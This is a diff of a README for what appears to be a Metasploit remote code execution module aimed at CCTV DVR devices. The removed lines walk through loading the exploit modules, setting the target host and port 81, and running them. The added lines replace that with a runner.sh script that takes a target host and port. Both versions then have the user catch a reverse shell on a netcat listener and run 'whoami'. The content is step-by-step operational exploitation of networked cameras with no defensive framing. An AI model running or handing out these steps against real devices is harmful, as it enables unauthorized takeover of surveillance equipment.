freddiebarrsmith/CCTV-Remote-Code-Execution-Metasploit-Module/README.md

 Step 3:

-bash ipswitcher 1337.1337.1337.1337

-(substitute 1337 etc. for the IP of your cloud-facing host)
+bash runner.sh -h targethost -p targetport

 Step 4:

-type msfconsole

-Step 5:

-use exploit/linux/http/CCTV_DVRwrite
-set RHOST yourtargethost.com
-set RPORT 81
-exploit

-(then wait for it to execute, ignore errors for the most part) Step 6:

-use exploit/linux/http/CCTV_DVRrun
-set RHOST yourtargethost.com
-set RPORT 81
-exploit

-(then wait for it to execute, ignore errors for the most part)

-Step 7:

-go back to your cloud or web-facing ip netcat session and type in:
+go back to your netcat listener or web-facing ip netcat session and type in:

 whoami